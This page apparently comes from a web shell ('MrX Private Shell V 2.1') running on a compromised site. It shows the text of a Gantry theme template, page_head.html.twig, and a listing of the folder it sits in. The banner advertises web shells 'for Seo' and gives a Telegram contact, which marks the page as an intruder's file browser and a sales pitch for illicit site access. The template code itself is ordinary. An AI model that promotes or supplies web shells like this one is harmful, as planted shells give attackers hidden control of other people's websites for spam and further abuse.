__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{%- do gantry.debugger.assets() -%}
{%- do gantry.theme.loadAtoms() -%}
{% set faEnabled = gantry.config.page.fontawesome.enable|default(1) %}
{% set faVersion = gantry.config.page.fontawesome.version ?? gantry.config.page.fontawesome.default_version ?? 'fa4' %}
{% assets with { priority: 10 } %}
{% block head_stylesheets -%}
<link rel="stylesheet" href="gantry-engine://css-compiled/nucleus.css" type="text/css"/>
{% for scss in gantry.theme.configuration.css.persistent|default(gantry.theme.configuration.css.files) %}
<link rel="stylesheet" href="{{ scss }}.scss" type="text/css"/>
{%- endfor %}
{% endblock -%}
{% block head_scripts -%}
{% if faEnabled %}
{% if faVersion == 'manual' or gantry.config.page.fontawesome.html_js_import|trim %}
{{ gantry.config.page.fontawesome.html_js_import|html|raw -}}
{% elseif faVersion == 'fa5js' %}
<script type="text/javascript" src="{{ url('gantry-assets://js/font-awesome6-all.min.js') }}"></script>
{% if gantry.config.page.fontawesome.fa4_compatibility|default(1) %}
<script type="text/javascript" src="{{ url('gantry-assets://js/font-awesome6-shim.min.js') }}"></script>
{% endif %}
{% endif %}
{% endif %}
{% endblock -%}
{% block head_platform %}{% endblock %}
{% block head_overrides -%}
{% if faEnabled %}
{% if faVersion == 'manual' or gantry.config.page.fontawesome.html_css_import|trim %}
{{ gantry.config.page.fontawesome.html_css_import|html|raw -}}
{% elseif faVersion == 'fa4' %}
<link rel="stylesheet" href="gantry-assets://css/font-awesome.min.css" type="text/css"/>
{% elseif faVersion == 'fa5css' %}
<link rel="stylesheet" href="gantry-assets://css/font-awesome6-all.min.css" type="text/css">
{% if gantry.config.page.fontawesome.fa4_compatibility|default(1) %}
{% endif %}
{% elseif (faVersion == 'fa5js' or (faVersion == 'manual' and gantry.config.page.fontawesome.html_js_import)) and (gantry.config.page.fontawesome.content_compatibility|default(1)) %}
<link rel="stylesheet" href="gantry-assets://css/font-awesome6-pseudo.min.css" type="text/css">
{% endif %}
{% endif %}
{% for scss in gantry.theme.configuration.css.overrides %}
<link rel="stylesheet" href="{{ scss }}.scss" type="text/css"/>
{%- endfor %}
{% endblock -%}
{% endassets -%}
<head>
{{ gantry.document.getHtml('head_top')|join("\n ")|raw }}
{% block head_meta %}
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
{% if gantry.config.page.head.meta -%}
{% for attributes in gantry.config.page.head.meta -%}
{%- for key, value in attributes %}
{% if key starts with 'og:' %}
<meta property="{{ key|e }}" content="{{ value|e }}" />
{% else %}
<meta name="{{ key|e }}" content="{{ value|e }}" />
{% endif %}
{% endfor -%}
{%- endfor -%}
{%- endif -%}
{{ gantry.document.getHtml('head_meta')|join("\n ")|raw }}
{% if gantry.config.page.assets.favicon %}
<link rel="icon" type="image/x-icon" href="{{ url(gantry.config.page.assets.favicon) }}" />
{% endif %}
{% if gantry.config.page.assets.touchicon %}
<link rel="apple-touch-icon" sizes="180x180" href="{{ url(gantry.config.page.assets.touchicon) }}">
<link rel="icon" sizes="192x192" href="{{ url(gantry.config.page.assets.touchicon) }}">
{% endif %}
{% endblock %}
{%- block head_title -%}
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Title</title>
{%- endblock %}
{% block head_application -%}
{{ gantry.styles('head')|join("\n")|raw }}
{{ gantry.scripts('head')|join("\n")|raw }}
{%- endblock %}
{% block head_ie_stylesheets -%}
{% endblock -%}
{% block head %}{% endblock -%}
{% block head_custom %}
{% if gantry.config.page.head.head_bottom %}
{{ gantry.config.page.head.head_bottom|raw }}
{% endif %}
{% endblock -%}
{{ gantry.document.getHtml('head_bottom')|join("\n ")|raw }}
</head>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| content | Folder | 0775 |
|
|
| layout | Folder | 0775 |
|
|
| partials | Folder | 0775 |
|
|
| page.html.twig | File | 3.29 KB | 0775 |
|
| page_head.html.twig | File | 4.45 KB | 0775 |
|